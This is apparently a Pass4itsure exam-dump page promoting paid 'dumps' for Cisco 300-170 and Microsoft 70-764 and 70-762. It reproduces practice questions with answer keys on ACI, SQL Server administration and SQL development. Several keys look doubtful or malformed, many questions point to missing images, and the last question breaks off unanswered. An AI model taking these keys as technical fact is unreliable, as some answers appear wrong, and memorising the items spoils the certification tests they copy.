How To Pass Cisco CCNP Data Center 300-170 Certification Exam

Get the Cisco CCNP Data Center 300-170 Certification Exam. “Implementing Cisco Data Center Virtualization and Automation (DCVAI)”: https://www.pass4itsure.com/300-170.html (Q&As: 135).
Free Cisco CCNP Data Center 300-170 exam practice test. Improve your skills and exam experience!

Get the latest Cisco CCNP Data Center 300-170 pdf

[PDF] Free Cisco 300-170 pdf dumps download from Google Drive: https://drive.google.com/open?id=1iY08MqNwvVK9v606ovEbrR9Xe4k52Vl9

Related Cisco CCNP Data Center Exam pdf

[PDF] Free Cisco 300-160 pdf dumps download from Google Drive: https://drive.google.com/open?id=1MeaAqUmvAlrfFpC_0KXF3e0ESn3EhArb
[PDF] Free Cisco 300-165 pdf dumps download from Google Drive: https://drive.google.com/open?id=1fTlrX__SMPiZaNpTO4CsigJ-Mi0op1PU
[PDF] Free Cisco 300-175 pdf dumps download from Google Drive: https://drive.google.com/open?id=1Bn5fjmuu0ZzHZnidIVFy6pZsWkwDpzIZ
[PDF] Free Cisco 300-180 pdf dumps download from Google Drive: https://drive.google.com/open?id=1M3kdgxChjiRczABkDLb7HJqTmUHKI8Vd

Valid information provided by Cisco officials

300-170 DCVAI – Cisco: https://www.cisco.com/c/en/us/training-events/training-certifications/exams/current-list/dcvai.html

The latest Cisco CCNP Data Center 300-170 exam practice questions test your strength

QUESTION 1
A system administrator checks the endpoint database and discovers MAC addresses that belong to inactive local
nodes. Which description of the retention of the MAC addresses for the local hosts is true?
A. After five minutes of inactivity, the hosts are removed from the local endpoint database of the leaf.
B. The local database is cleared only when the leaf reboots.
C. The leaf sends three ARP requests to the hosts after an aging period. If the switch receives no response, the hosts
are removed from the local endpoint database of the leaf.
D. After 30 minutes of inactivity, the hosts are removed from the local endpoint database of the leaf.
Correct Answer: A

 

QUESTION 2
Which two options are purposes of a device package? (Choose two.)
A. to identify a set of network or service functions required by the application
B. to provide a leaf and spine devices with operating systems and firmware
C. to provide a Cisco APIC with information about device specifics
D. to render the services required by a graph
E. to manage a class of service devices
Correct Answer: CE
Reference: https://webcache.googleusercontent.com/search?q=cache:sbj6aGf31j0J:https://www.cisco.com/c/en/us/td/d
ocs/switches/datacenter/aci/apic/sw/1-x/L4-L7_Services_Deployment/guide/b_L4L7_Deploy_ver211/
b_L4L7_Deploy_ver211_chapter_011pdf+andcd=1andhl=enandct=clnkandgl=inandclient=firefox-b-ab

 

QUESTION 3
You deploy AVS for Virtual Machine Manager integration and you add a host that has five VMNICs. You must use
VXLAN to maximize the load balancing of the traffic inside the fabric. How many VMKNICs must you add?
A. 2
B. 3
C. 4
D. 8
Correct Answer: C


QUESTION 4
Why should you configure DHCP relay for Virtual Machine Manager integration?
A. to create VTEP VMK interfaces on each host for the OpFlex control channel
B. to provide IP addresses to ESXi hosts
C. to provide IP addresses to virtual hosts through the VXLAN infrastructure
D. to ensure that virtual hosts have the same address when they are moved by using VMware vMotion
Correct Answer: B
Reference: http://www.cisco.com/c/en/us/solutions/collateral/data-center-virtualization/application-centric-infrastructure/white-paper-c11-738412.pdf

 

QUESTION 5
Which Cisco technology addresses management and performance concerns in a data center by unifying physical and
virtual switch management?
A. VSD
B. SVM
C. VM-FEX
D. AVS
Correct Answer: C
Reference: http://www.cisco.com/c/en/us/products/collateral/interfaces-modules/ucs-m81kr-virtual-interface-card/white_paper_c11-618838.pdf

 

QUESTION 6
A system administrator checks the endpoint database and discovers MAC addresses that belong to inactive local
nodes. Which description of the retention of the MAC addresses for the local nodes is true?
A. After five minutes, the inactive nodes are removed from the local endpoint database of the leaf.
B. The local database if cleared only when the leaf reboots.
C. The leaf sends three ARP requests after an aging period. The MAC addresses are stored to the local endpoint
database as long as the devices respond to the requests
D. After 15 minutes, the inactive nodes are removed from the local endpoint database of the leaf.
Correct Answer: A


QUESTION 7
Which two methods does a Cisco APIC support to connect to the management IP address of a service appliance?
(Choose two.)
A. out-of-band connectivity to devices in device clusters by using the management VLAN
B. in-band connectivity to devices in device clusters by using the VRF of the tenant
C. out-of-band connectivity to devices in device clusters by using the VRF of the tenant
D. out-of-band connectivity to devices in device clusters by using the management VRF of the tenant
E. in-band connectivity to devices in device clusters by using the management VRF of the tenant
Correct Answer: AB

 

QUESTION 8

pass4itsure 300-170 exam question q8

Refer to the exhibit. Which description of the configuration of the Cisco Nexus 1000V Series Switch is true?
A. VSM connects to the VMware vCenter server
B. Mgmt0 is a Layer 2 interface
C. SVS mode is set to L3.
D. Packet VLAN is a private VLAN
Correct Answer: A


QUESTION 9
When you perform a task in the Cisco APIC GUI, the GUI creates and sends internal API messages to the operating
system to exclude the task. Which ACI tool enables you to view and copy the API messages?
A. SPAN
B. Postman
C. syslog
D. API Inspector
E. SNMP
F. EPG Listener
Correct Answer: D
Reference: https://www.cisco.com/c/en/us/td/docs/switches/datacenter/aci/apic/sw/2-x/GSG/b_APIC_Getting_Started_Guide_Rel_2_x/b_APIC_Getting_Started_Guide_Rel_2_x_chapter_011.html

 

QUESTION 10

pass4itsure 300-170 exam question q10

Refer to the exhibit. Which result occurs when a user without a role attempts to log into the fabric?
A. The user is denied access.
B. The user is assigned to the local domain.
C. The user is assigned to a default role.
D. The user is authenticated by using TACACS.
Correct Answer: C

 

QUESTION 11
You are performing VMM integration between ACI and VMware with vDS. You place a Cisco UCS Fabric Interconnect
between the leaf and the ESXi hosts running on UCS-B series. Which is a valid configuration if using VMM integration
with “On Demand” resolution?
A. In the interface policy group, disable LLDP, enable Cisco Discovery Protocol, and then select MAC pinning on the
Fabric Interconnects.
B. In the interface policy, enable LLDP, Cisco Discovery Protocol, and LACP.
C. In the interface policy group, disable LLDP, disable Cisco Discovery Protocol, and then select active in the LACP
policy
D. Configure LLDP, Cisco Discovery Protocol, and LACP policies under global policies to match the interface policies.
Correct Answer: A

 

QUESTION 12
You have a Cisco Nexus device that is configured to use a RADIUS server. What occurs when local RBAC user account
and RADIUS roles exist simultaneously?
A. Only rules that are in local roles and the radius roles are applied
B. Rules from local account and radius account are merged
C. Only rules from local are applied
D. Only rules from Radius are applied
Correct Answer: D

 

QUESTION 13
Which Layer 3 protocol is used within the ACI fabric?
A. OperFlow
B. EIGRP
C. OSPF
D. IS-IS
Correct Answer: D

Follow Pass4itsure free sharing of YouTube channels

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video.
Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ/videos get more useful exam content.

Watch the Cisco CCNP Data Center 300-170 video tutorial online

Share Pass4itsure coupons for free

pass4itsure coupon

Reasons to choose Pass4itsure

Pass4itsure offers the latest exam practice questions and answers free of charge! Update all exam questions throughout the year, with a number of professional exam experts! To make sure it works! Maximum pass rate, best value for money! Helps you pass the exam easily on your first attempt.

why pass4itsure

This maybe you’re interested

Summarize:

The latest Cisco CCNP Data Center 300-170 dumps, online 300-170 practice test questions,
pass 300-170 exam: https://www.pass4itsure.com/300-170.html (Q&As: 135). Boost exam skills Share 300-170 pdf and 300-170 Youtube videos for free

Latest Microsoft MCSA 70-764 exam dumps, 70-764 Exam Practice Tests | 100% Free

Easily pass the Microsoft MCSA 70-764 exam: “Administering a SQL Database Infrastructure – Microsoft” – https://www.pass4itsure.com/70-764.html (Q&As: 442) Free share the latest 70-764 dumps questions and answers!
Practice the test online! Improve your skills and exam experience!

Download Microsoft MCSA 70-764 PDF Online

[PDF] Free Microsoft 70-764 pdf dumps download from Google Drive: https://drive.google.com/open?id=1nweN7smpSUzgpRXVuZ9joMmky2RFaDWG

[PDF] Free Full Microsoft pdf dumps download from Google Drive: https://drive.google.com/open?id=1gdQrKIsiLyDEsZ24FxsyukNPYmpSUDDO

Valid information provided by Microsoft officials

Exam 70-764: Administering a SQL Database Infrastructure – Microsoft: https://www.microsoft.com/en-us/learning/exam-70-764.aspx

This exam is intended for database professionals who perform installation, maintenance, and configuration tasks.
Other responsibilities include setting up database systems, making sure those systems operate efficiently, and regularly storing, backing up, and securing data from unauthorized access.

pass4itsure 70-764 Skills measured

This exam measures your ability to accomplish the technical tasks listed below.

Configure data access and auditing (20–25%)

  • Configure encryption
  • Configure data access and permissions
  • Configure auditing

Manage backup and restore of databases (20–25%)

  • Develop a backup strategy
  • Restore databases
  • Manage database integrity

Manage and monitor SQL Server instances (35–40%)

  • Monitor database activity
  • Monitor queries
  • Manage indexes
  • Manage statistics
  • Monitor SQL Server instances

Manage high availability and disaster recovery (20–25%)

  • Implement log shipping
  • Implement AlwaysOn Availability Groups
  • Implement failover cluster instances

Latest effective Microsoft MCSA 70-764 Exam Practice Tests

QUESTION 1
You plan to migrate the DB to Azure.
You verify that all objects are valid for Azure SQL database. You need to ensure that users and logins are migrated to
Azure.
What should you do?
A. Use the Copy Database wizard
B. Use the Database Transfer wizard
C. Use the SQL Management Studio to deploy the DB to Azure
D. Back up the database from the local server and restore it to Azure
Correct Answer: CD

 

QUESTION 2
You manage a Microsoft SQL Server environment. You plan to encrypt data when you create backups.
You need to configure the encryption options for backups.
What should you configure?
A. a certificate
B. an MD5 hash
C. a DES key
D. an AES 256-bit key
Correct Answer: D
To encrypt during backup, you must specify an encryption algorithm, and an encryptor to secure the encryption key. The
following are the supported encryption options: Encryption Algorithm: The supported encryption algorithms are: AES
128, AES 192, AES 256, and Triple DES Encryptor: A certificate or asymmetric Key
References: https://docs.microsoft.com/en-us/sql/relational-databases/backup-restore/backup-encryption

 

QUESTION 3
You use Microsoft SQL Server 2016 to write code for a transaction that contains several statements.
There is high contention between readers and writers on several tables used by your transaction. You need to minimize
the use of the tempdb space.
You also need to prevent reading queries from blocking writing queries.
Which isolation level should you use?
A. SERIALIZABLE
B. SNAPSHOT
C. READ COMMITTED SNAPSHOT
D. REPEATABLE READ
Correct Answer: C
For most applications, read committed isolation using row versioning is recommended over snapshot isolation for the
following reasons:
It consumes less tempdb space than snapshot isolation.
Etc.
References: https://msdn.microsoft.com/en-us/library/ms188277.aspx

 

QUESTION 4
An organization deploys Microsoft SQL Server instances at the main office and the organization\\’s remote office. SQL
The server is not using Windows failover clustering.
Remote employef s report connection issues when they attempt to run queries against a specific database that is hosted
at the main office.
You need to ensure that remote employees can retrieve data from a database instance that is hosted in the remote
office.
Which three actions should you perform in sequence? To answer, move the appropriate actions from the list of actions
to the answer area and arrange them in the correct order.
Select and Place:pass4itsure 70-764 exam question q4

Correct Answer:

pass4itsure 70-764 exam question q4-1

Database mirroring is a solution for increasing the availability of a SQL Server database.
Mirroring is implemented on a per-database basis and works only with databases that use the full recovery model.

 

QUESTION 5
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution that might meet the stated goals. Some question sets might have more than one correct solution,
while
others might not have a correct solution.
After you answer a question in this section, you will NOT be able to return to it. As a result, these questions will not
appear in the review screen.
Your company is developing a new business intelligence application that will access data in a Microsoft Azure SQL
Database instance. All objects in the instance have the same owner.
A new security principal named BI_User requires permission to run stored procedures in the database. The stored
procedures read from and write to tables in the database. None of the stored procedures perform IDENTIFY_INSERT
operations or dynamic SQL commands.
The scope of permissions and authentication of BI_User should be limited to the database. When granting permissions,
you should use the principle of least privilege.
You need to create the required security principals and grant the appropriate permissions.
Solution: You run the following Transact-SQL statement in the database:pass4itsure 70-764 exam question q5

Does the solution meet the goal?
A. Yes
B. No
Correct Answer: B
We need to add a login.
Secondly, it is enough to grant EXECUTE permissions on the stored procedures for database roles you want to be able
to access the data. We do not need to add roles to this user.
Note: One method of creating multiple lines of defense around your database is to implement all data access using
stored procedures or user-defined functions. You revoke or deny all permissions to underlying objects, such as tables,
and
grant EXECUTE permissions on stored procedures. This effectively creates a security perimeter around your data and
database objects.
Best Practices
Simply writing stored procedures isn\\’t enough to adequately secure your application. You should also consider the
following potential security holes.
Grant EXECUTE permissions on the stored procedures for database roles you want to be able to access the data.
Revoke or deny all permissions to the underlying tables for all roles and users in the database, including the public role.
All users inherit permissions from the public. Therefore denying permissions to public means that only owners and
sysadmin
members have access; all other users will be unable to inherit permissions from membership in other roles.
Do not add users or roles to the sysadmin or db_owner roles. System administrators and database owners can access
all database objects.
References: https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/managing-permissions-with-stored-procedures-in-sql-server

 

QUESTION 6
DRAG DROP
You have a table that contains a column named Department. Each user is assigned to a database role name that
matches the Department column value. Users authenticate to the database with accounts that are assigned to their department’s database role. You belong to the db_owner role and have the rights to run the EXECUTE AS USER
statement.
Users must only view records that match their department.
You need to implement Microsoft SQL Server row-level security (RLS) and test the implementation.
Which three actions should you perform in sequence? To answer, move the appropriate actions from the list of actions
to the answer area and arrange them in the correct order.
Select and Place:pass4itsure 70-764 exam question q6

Correct Answer:

pass4itsure 70-764 exam question q6-1

Step 1: Create a filter predicate by using a SQL Server inline table-valued user-defined function.
Create a new schema and an inline table-valued function.
Step 2: Create a security policy
Create a security policy adding the function as a filter predicate.
The CREATE SECURITY POLICY command creates a security policy for row level security.
Step 3: Run EXECUTE AS USER
References:
https://docs.microsoft.com/en-us/sql/t-sql/statements/create-security-policy-transact-sql?view=sql-server-2017
https://docs.microsoft.com/en-us/sql/relational-databases/security/row-level-security

 

QUESTION 7
You administer a Microsoft SQL Server 2016 server.
You plan to deploy new features to an application.
You need to evaluate existing and potential clustered and non-clustered indexes that will improve performance.
What should you do?
A. Query the sys.dm_db_index_usage_stats DMV.
B. Query the sys.dm_db_missing_index_details DMV.
C. Use the Database Engine Tuning Advisor.
D. Query the sys.dm_db_missing_index_columns DMV.
Correct Answer: C
The Microsoft Database Engine Tuning Advisor (DTA) analyzes databases and makes recommendations that you can
use to optimize query performance. You can use the Database Engine Tuning Advisor to select and create an optimal
set of indexes, indexed views, or table partitions without having an expert understanding of the database structure or the internals of SQL Server. Using the DTA, you can perform the following tasks. Troubleshoot the performance of a
specific problem query Tune a large set of queries across one or more databases Perform an exploratory what-if
analysis of potential physical design changes Manage storage space References: https://docs.microsoft.com/en-us/sql/relational-databases/performance/database-engine-tuning-advisor

 

QUESTION 8
You administer a single server that contains a Microsoft SQL Server 2016 default instance.
You plan to install a new application that requires the deployment of a database on the server. The application login
requires sysadmin permissions.
You need to ensure that the application login is unable to access other production databases.
What should you do?
A. Use the SQL Server default instance and configure an affinity mask.
B. Install a new named SQL Server instance on the server.
C. Use the SQL Server default instance and enable Contained Databases.
D. Install a new default SQL Server instance on the server.
Correct Answer: B

SQL Server supports multiple instances of SQL Server on a single server or processor, but only one instance can be the
default instance. All others must be named instances. A computer can run multiple instances of SQL Server
concurrently, and each instance runs independently of other instances.
References: https://msdn.microsoft.com/en-us/library/ms143531(v=SQL.105).aspx

 

QUESTION 9
You have a database named DB1. You complete a full backup on January 1, 2018, to a backup set named DB1_Backup.
You create a differential backup January 2, 2018, to the same backup set. You perform transaction log backups each
day at 1:00 PM.
DB1 experiences a catastrophic failure.
You need to restore the database to January 3, 2018, at 11:00 AM.
Which three Transact-SQL segments should you use to develop the solution? To answer, move the appropriate
Transact-SQL segment from the list of Transact-SQL segments to the answer area and arrange them in the correct
order.
Select and Place:pass4itsure 70-764 exam question q9

Correct Answer:

pass4itsure 70-764 exam question q9-1

This example restores a database, differential database, and transaction log backup of the MyAdvWorks database.
Step 1:
— Assume the database is lost at this point. Now restore the full
— database. Specify the original full database backup and NORECOVERY.
— NORECOVERY allows subsequent restore operations to proceed.
RESTORE DATABASE MyAdvWorks
FROM MyAdvWorks_1
WITH NORECOVERY;
GO
Step 2:
— Now restore the differential database backup, the second backup on
— the MyAdvWorks_1 backup device.
RESTORE DATABASE MyAdvWorks
FROM MyAdvWorks_1
WITH FILE = 2,
NORECOVERY;
Step 3:
— Now restore each transaction log backup created after
— the differential database backup.
RESTORE LOG MyAdvWorks
FROM MyAdvWorks_log1
WITH NORECOVERY; GO RESTORE LOG MyAdvWorks FROM MyAdvWorks_log2 WITH RECOVERY; GO
References: https://docs.microsoft.com/en-us/sql/relational-databases/backup-restore/restore-a-differential-database-backup-sql-server

 

QUESTION 10
You have a database named DB1.
DB1 contains a table named Sales. The SalesPerson that has an index named AK_SalesPerson_rowguid.
Queries that do not use the index take approximately 10 times longer to complete than queries that use the index. You
discover that AK_SalesPerson_rowguid has severe fragmentation. You need to recommend a solution to defragment
the index.
The solution must ensure that the index can be used by queries during the defragmentation.
What statement should you use? To answer, drag the appropriate elements to the correct locations. Each element may
be used once, more than once, or not at all. You may need to drag the split bar between panes or scroll to view content
Select and Place:pass4itsure 70-764 exam question q10

Correct Answer:

pass4itsure 70-764 exam question q10-1

Rebuilding an index can be executed online or offline. Reorganizing an index is always executed online. To achieve
availability similar to the reorganize option, you should rebuild indexes online. Use: ALTER INDEX REBUILD WITH
(ONLINE = ON)
References: Reorganize and Rebuild Indexes https://msdn.microsoft.com/enus/library/ms189858.aspx

 

QUESTION 11
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution that might meet the stated goals. Some question sets might have more than one correct solution, while others might not have a correct solution.
After you answer a question in this section, you will NOT be able to return to it. As a result, these questions will not
appear in the review screen.
You have a database named DB1 that is 640 GB and is updated frequently.
You enable log shipping for DB1 and configure backup and restore to occur every 30 minutes.
You discover that the hard disks on the database server are almost full.
You need to reduce the amount of disk space used by the log shipping process.
Solution: You configure log shipping to backup and restore by using a single shared folder.
Does this meet the goal?
A. Yes
B. No
Correct Answer: B
You should compress the transaction log backups.
References: https://docs.microsoft.com/en-us/sql/database-engine/log-shipping/configure-log-shipping-sql-server?view=sql-server-2017

 

QUESTION 12
You are a database administrator for an organization. You manage a mission-critical database named DB1 that is
hosted on a server named LON-SQL1.
An audit record for transactions that occur in DB1 is written to a file every five seconds. If an audit record cannot be
recorded, the transaction must be terminated. You create a shared folder named Audits on a server named LON-SVR1.
You need to implement the process for recording audit records.
How should you complete the Transact-SQL statement? To answer, select the appropriate Transact-SQL segment in
the answer area.
NOTE: Each correct selection is worth one point.
Hot Area:pass4itsure 70-764 exam question q12

Correct Answer:

pass4itsure 70-764 exam question q12-1

Box 1: Server Audit The CREATE SERVER AUDIT command creates a server audit object using SQL Server Audit. Box
2: FILE(FILEPATH=\\’\\LON-SVR1\Audits\\\’) An audit record for transactions that occur in DB1 are written to a file every
five seconds. You create a shared folder named Audits on a server named LON-SVR1. Box 3: QUEUE_DELAY=5000
QUEUE_DELAY =integer Determines the time, in milliseconds, that can elapse before audit actions are forced to be
processed. A value of 0 indicates synchronous delivery. The minimum settable query delay value is 1000 (1 second),
which is the default. Box 4: ON_FAILURE= FAIL_OPERATION FAIL_OPERATION Database actions fail if they cause
audited events. Actions, which do not cause audited events can continue, but no audited events can occur. The audit
continues to attempt to log events and resumes if the failure condition is resolved. Use this option when maintaining a
complete audit is more important than full access to the Database Engine.
References: https://docs.microsoft.com/en-us/sql/t-sql/statements/create-server-audit-transact-sql

 

QUESTION 13
Note: This question is part of a series of questions that use the same scenario. For your convenience, the scenario is
repeated in each question. Each question presents a different goal and answers choices, but the text of the scenario is exactly the same in each question in this series.
You are a database administrator for a company that has an on-premises Microsoft SQL Server environment and
Microsoft Azure SQL Database instances. The environment hosts several customer databases, and each customer
uses a
dedicated instance. The environments that you manage are shown in the following table.pass4itsure 70-764 exam question q13

You need to configure auditing for the Adventure Works environment.
How should you complete the Transact-SQL statement? To answer, select the appropriate options in the answer area.
NOTE: Each correct selection is worth one point.
Hot Area:

pass4itsure 70-764 exam question q13-1

Correct Answer:

pass4itsure 70-764 exam question q13-2

Box 1: CREATE SERVER AUDIT
Create a server audit.
You must implement auditing to record access to data that is considered sensitive by the company.
Create database audit
Box 2: ALTER SERVER AUDIT
Enable the server audit.
Box 3: CREATE DATABASE AUDIT
Create the database audit specification.
Box 4: FOR SERVER AUDIT
You must implement auditing for all objects in the DAV schema.
References: https://docs.microsoft.com/en-us/sql/relationaldatabases/security/auditing/create-a-server-audit-and-database-audit-specification

The latest Microsoft MCSA 70-764 dumps help you get on the ladder of success! Get the latest updates from the 70-764 exam: https://www.pass4itsure.com/70-764.html (Q&As: 442) For more effective exam dumps,
follow me!

Pass4itsure Promo Code 15% Off

pass4itsure 70-764 coupon

Why Choose Pass4itsure?

Pass4itsure is the best provider of IT learning materials and the right choice for you to prepare for the Microsoft 70-764 exam. Other brands started earlier, but the price is relatively expensive and the questions are not the newest. Pass4itsure provides the latest real questions and answers with the lowest prices, help you pass 70-764 exam easily at first try.

why pass4itsure 70-764 dumps

Maybe you might like the exam questions and answers

Latest Microsoft MCSA 70-762 exam dumps, 70-762 Exam Practice Tests | 100% Free

70-762 dumps

Easily pass the Microsoft MCSA 70-762 exam: “Developing SQL Databases – Microsoft” – https://www.pass4itsure.com/70-762.html (Q&As: 164) Free share the latest 70-762 dumps questions and answers!
Practice the test online! Improve your skills and exam experience!

Download Microsoft MCSA 70-762 PDF Online

[PDF] Free Microsoft 70-762 pdf dumps download from Google Drive: https://drive.google.com/open?id=16YGfdkXafi6wi18c0U7NNxmFVa3W_bXB

[PDF] Free Full Microsoft pdf dumps download from Google Drive: https://drive.google.com/open?id=1gdQrKIsiLyDEsZ24FxsyukNPYmpSUDDO

Valid information provided by Microsoft officials

Exam 70-762: Developing SQL Databases – Microsoft: https://www.microsoft.com/en-us/learning/exam-70-762.aspx

This exam is intended for database professionals who build and implement databases across organizations and who ensure high levels of data availability. Their responsibilities include creating database files, data types, and tables; planning, creating, and optimizing indexes; ensuring data integrity; implementing views, stored procedures, and functions; and managing transactions and locks.

pass4itsure 70-762 Skills measured

This exam measures your ability to accomplish the technical tasks listed below. The percentages indicate the relative weight of each major topic area on the exam.

Design and implement database objects (25–30%)

  • Design and implement a relational database schema
  • Design and implement indexes
  • Design and implement views
  • Implement columnstore indexes

Implement programmability objects (20–25%)

  • Ensure data integrity with constraints
  • Create stored procedures
  • Create triggers and user-defined functions

Manage database concurrency (25–30%)

  • Implement transactions
  • Manage isolation levels
  • Optimize concurrency and locking behavior
  • Implement memory-optimized tables and native stored procedures

Optimize database objects and SQL infrastructure (20–25%)

  • Optimize statistics and indexes
  • Analyze and troubleshoot query plans
  • Manage performance for database instances
  • Monitor and trace SQL Server baseline performance metrics

Latest effective Microsoft MCSA 70-762 Exam Practice Tests

QUESTION 1
You have a trigger named CheckTriggerCreation that runs when a user attempts to create a trigger. The
The CheckTriggerCreation trigger was created with the ENCRYPTION option and additional proprietary business logic.
You need to prevent users from running the ALTER and DROP statements or the sp_tableoption stored procedure.
Which three Transact-SQL segments should you use to develop the solution? To answer, move the appropriate
Transact-SQL segments from the list of Transact-SQL segments to the answer area and arrange them in the correct
order.
Select and Place:pass4itsure 70-762 exam question q1

Correct Answer:

pass4itsure 70-762 exam question q1-1

 

QUESTION 2
Note: This question is part of a series of questions that use the same or similar answer choices. An answer choice may
be correct for more than one question in the series. Each question is independent of the other questions in this series.
Information and details provided in a question apply only to that question.
You have a database named DB1. There is no memory-optimized filegroup in the database. You run the following
query:pass4itsure 70-762 exam question q2

The following image displays the execution plan the query optimizer generates for this query: Users frequently run the
same query with different values for the local variable @lastName. The table named Person is persisted on disk. You
need to create an index on the Person. Person table that meets the following requirements:

pass4itsure 70-762 exam question q2-1

1.
All users must be able to benefit from the index.
2.
FirstName must be added to the index as an included column.
What should you do?
A. Create a clustered index on the table.
B. Create a nonclustered index on the table.
C. Create a nonclustered filtered index on the table.
D. Create a clustered column store index on the table.
E. Create a nonclustered column store index on the table.
F. Create a hash index on the table.
Correct Answer: B
By including nonkey columns, you can create nonclustered indexes that cover more queries. This is because the
no key columns have the following benefits:
They can be data types not allowed as index key columns.
They are not considered by the Database Engine when calculating the number of index key columns or index key size.

 

QUESTION 3
You are monitoring a Microsoft Azure SQL Database.
The database is experiencing high CPU consumption.
You need to determine which query uses the most cumulative CPU.
How should you complete the Transact-SQL statement? To answer, drag the appropriate Transact-SQL segments to
the correct locations. Each Transact-SQL segment may be used once, more than one or not at all. You may need to
drag
the split bar between panes or scroll to view content.
Select and Place:pass4itsure 70-762 exam question q3

Correct Answer:

pass4itsure 70-762 exam question q3-1

Box 1: sys.dm_exec_query_stats sys.dm_exec_query_stats returns aggregate performance statistics for cached query
plans in SQL Server. Box 2: highest_cpu_queries.total_worker_time DESC Sort ontotal_worker_time column
Example:
The following example returns information about the top five queries ranked by average CPU time.
This example aggregates the queries according to their query hash so that logically equivalent queries are grouped by
their cumulative resource consumption.
USE AdventureWorks2012;
GO
SELECT TOP 5 query_stats.query_hash AS “Query Hash”,
SUM(query_stats.total_worker_time) / SUM(query_stats.execution_count) AS “Avg CPU Time”,
MIN(query_stats.statement_text) AS “Statement Text”
FROM
(SELECT QS.*,
SUBSTRING(ST.text, (QS.statement_start_offset/2) + 1,
((CASE statement_end_offset
WHEN -1 THEN DATALENGTH(ST.text)
ELSE QS.statement_end_offset END
-QS.statement_start_offset)/2) + 1) AS statement_text FROM sys.dm_exec_query_stats AS QS CROSS APPLY
sys.dm_exec_sql_text(QS.sql_handle)as ST) as query_stats GROUP BY query_stats.query_hash ORDER BY 2
DESC;
References:
https://msdn.microsoft.com/en-us/library/ms189741.aspx

 

QUESTION 4
You have a database that contains both disk-based and memory-optimized tables.pass4itsure 70-762 exam question q4

You need to create two modules. The modules must meet the requirements described in the following table.
Which programming object should you use for each module? To answer, select the appropriate object types in the
answer area.
Hot Area:

pass4itsure 70-762 exam question q4-1

Correct Answer:

pass4itsure 70-762 exam question q4-2

Returning Data by Using OUTPUT Parameters
If you specify the OUTPUT keyword for a parameter in the procedure definition, the stored procedure can return the current value of the parameter to the calling program when the stored procedure exits.
SQL Server stored procedures, views and functions are able to use the WITH ENCRYPTION option to disguise the
contents of a particular procedure or function from discovery.
Native Compilation of Tables and Stored Procedures
In-Memory OLTP introduces the concept of native compilation. SQL Server can natively compile stored procedures that
access memory-optimized tables. SQL Server is also able to natively compile memory-optimized tables. Native
compilation
allows faster data access and more efficient query execution than interpreted (traditional) Transact-SQL. Native
compilation of tables and stored procedures produce DLLs.
References:
https://technet.microsoft.com/en-us/library/ms187004(v=sql.105).aspx
https://msdn.microsoft.com/en-us/library/dn249342.aspx

 

QUESTION 5
Note: This question is part of a series of questions that use the same scenario. For your convenience, the scenario is
repeated in each question. Each question presents a different goal and answers choices, but the text of the scenario is
exactly the same in each question in this series.
You have a database that contains the following tables: blog category, blog entry, ProductReview, Product, and
SalesPerson. The tables were created using the following Transact SQL statements:pass4itsure 70-762 exam question q5

You must modify the ProductReview Table to meet the following requirements:
The table must reference the ProductID column in the Product table
Existing records in the ProductReview table must not be validated with the Product table.
Deleting records in the Product table must not be allowed if records are referenced by the ProductReview table.
Changes to records in the Product table must propagate to the ProductReview table.
You also have the following database tables: Order, ProductTypes, and SalesHistory. The Transact-SQL statements for
these tables are not available.
You must modify the Orders table to meet the following requirements:
Create new rows in the table without granting INSERT permissions to the table.
Notify the salesperson who places an order whether or not the order was completed.
You must add the following constraints to the SalesHistory table:
a constraint on the SaleID column that allows the field to be used as a record identifier
a constant that uses the ProductID column to reference the Product column of the ProductTypes table
a constraint on the CategoryID column that allows one row with a null value in the column
a constraint that limits the SalePrice column to values greater than four
Finance department users must be able to retrieve data from the SalesHistory table for salespersons where the value
of the SalesYTD column is above a certain threshold.
You plan to create a memory-optimized table named SalesOrder. The table must meet the following requirements:
The table must hold 10 million unique sales orders.
The table must use checkpoints to minimize I/O operations and must not use transaction logging.
Data loss is acceptable.
Performance for queries against the SalesOrder table that use WHERE clauses with exact equality operations must be
optimized.
You need to modify the environment to meet the requirements for the Orders table.
What should you create?
A. an AFTER UPDATE trigger
B. a user-defined function
C. a stored procedure with output parameters
D. an INSTEAD OF INSERT trigger
Correct Answer: D
From Question: You must modify the Orders table to meet the following requirements: Create new rows in the table
without granting INSERT permissions to the table. Notify the salesperson who places an order whether or not the order
was completed.
References: https://docs.microsoft.com/en-us/sql/t-sql/statements/create-trigger-transact-sql?view=sql-server-2017

 

QUESTION 6
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution. Determine whether the solution meets the stated goals.
You have a database that contains a table named Employees. The table stores information about the employees of your
company.
You need to implement and enforce the following business rules:
Limit the values that are accepted by the Salary column.
Prevent salaries less than $15,000 and greater than $300,000 from being entered.
Determine valid values by using logical expressions.
Do not validate data integrity when running DELETE statements.
Solution: You implement a FOR UPDATE trigger on the table.
Does the solution meet the goal?
A. Yes
B. No
Correct Answer: B
References: http://stackoverflow.com/questions/16081582/difference-between-for-update-of-and-for-update

 

QUESTION 7
You are developing an application that connects to a database. The application runs the following jobs:pass4itsure 70-762 exam question q7

The READ_COMMITTED_SNAPSHOT database option is set to OFF, and auto-content is set to ON. Within the stored
procedures, no explicit transactions are defined.
If JobB starts before Joba, it can finish in seconds. If Joba starts first, JobB takes a long time to complete.
You need to use Microsoft SQL Server Profiler to determine whether the blocking that you observe in JobB is caused by
locks acquired by Joba.
Which trace event class in the Locks event category should you use?
A. LockAcquired
B. LockCancel
C. LockDeadlock
D. lock escalation 
Correct Answer: A
The Lock: Acquired event class indicates that acquisition of a lock on a resource, such as a data page, has been
achieved.
The Lock: Acquired and Lock: Released event classes can be used to monitor when objects are being locked, the type of
locks taken, and for how long the locks were retained. Locks retained for long periods of time may cause contention issues and should be investigated.

 

QUESTION 8
You are experiencing performance issues with the database server.
You need to evaluate schema locking issues, plan cache memory pressure points, and backup I/O problems.
What should you create?
A. a System Monitor report
B. a sys.dm_tran_database_transaction dynamic management view query
C. an Extended Events session that uses Query Editor
D. an Activity Monitor session in Microsoft SQL Management Studio.
Correct Answer: D
References: https://msdn.microsoft.com/en-us/library/hh212951.aspx

 

QUESTION 9
HOTSPOT
You are performing a code review for Transact-SQL statements.
Which action does the constraint in each statement perform? To answer, select the appropriate options in the answer
area.
NOTE: Each correct selection is worth one point.
Hot Area:pass4itsure 70-762 exam question q9

Correct Answer:

